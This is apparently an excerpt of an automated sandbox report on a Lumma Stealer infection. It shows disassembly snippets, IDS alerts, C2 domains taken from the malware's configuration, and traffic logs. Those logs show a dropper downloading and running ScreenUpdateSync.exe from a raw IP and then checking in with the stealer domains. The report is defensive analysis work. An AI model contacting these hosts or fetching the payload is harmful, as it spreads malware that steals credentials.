                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_024C6739
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_024B87DF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_024B77E9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp ecx3_2_024DC79B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, eax3_2_024C7797
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebx, edi3_2_024BD4D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_024C54D1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_024B554C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_024B6544
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_024DD557
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_024DD557
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024BC528
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024C552B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_024C559D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024C55B3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_024ADA09
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_024ADA09
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_024AEAA2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_024ACB7E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024C5BF7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, di3_2_024C5BF7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024AABA7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, ecx3_2_024AABA7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024CB75E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB75E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024B4806
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_024C0817
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_024D3897
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024CC8B1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024CC94B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024B6907
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov eax, edx3_2_024BC921
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_024C89C0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_024DA9DE
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024CC98D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024CC99C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_024D6E67
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_024B5F79
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024C1F77
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_024B8F35
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_024B8F35
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_024DCFC7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_024ADF8C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_024DBC08
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_024C9C17
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_024BEC17
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_024D6C3B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov esi, eax3_2_024C3C9B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024DAD19
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_024DCD87

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:50583 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.8:52321 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:59245 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.8:50741 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.8:51869 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.8:50855 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.8:56023 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.8:54571 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.8:49571 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49711 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.207.38:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: Malware configuration extractorURLs: immureprech.biz
                Performs DNS queries to domains with low reputation
                Source: DNS query: effecterectz.xyz
                Source: DNS query: diffuculttan.xyz
                Source: DNS query: debonairnukk.xyz
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 08:20:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 15 Dec 2024 08:15:01 GMTETag: "58600-6294aa91c6503"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 29 04 00 50 00 00 00 00 10 42 00 30 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 22 00 00 00 10 04 00 00 24 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 f4 00 00 00 10 42 00 00 f6 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 176.113.115.19:80
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.207.38:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 104.21.56.70:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=4670f5074b9bfea360f04536; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 15 Dec 2024 08:20:37 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: AZCFTWko2q.exe, AZCFTWko2q.exe, 00000000.00000003.3768738842.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895946640.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                Source: AZCFTWko2q.exe, 00000000.00000003.3768738842.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895946640.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe.-
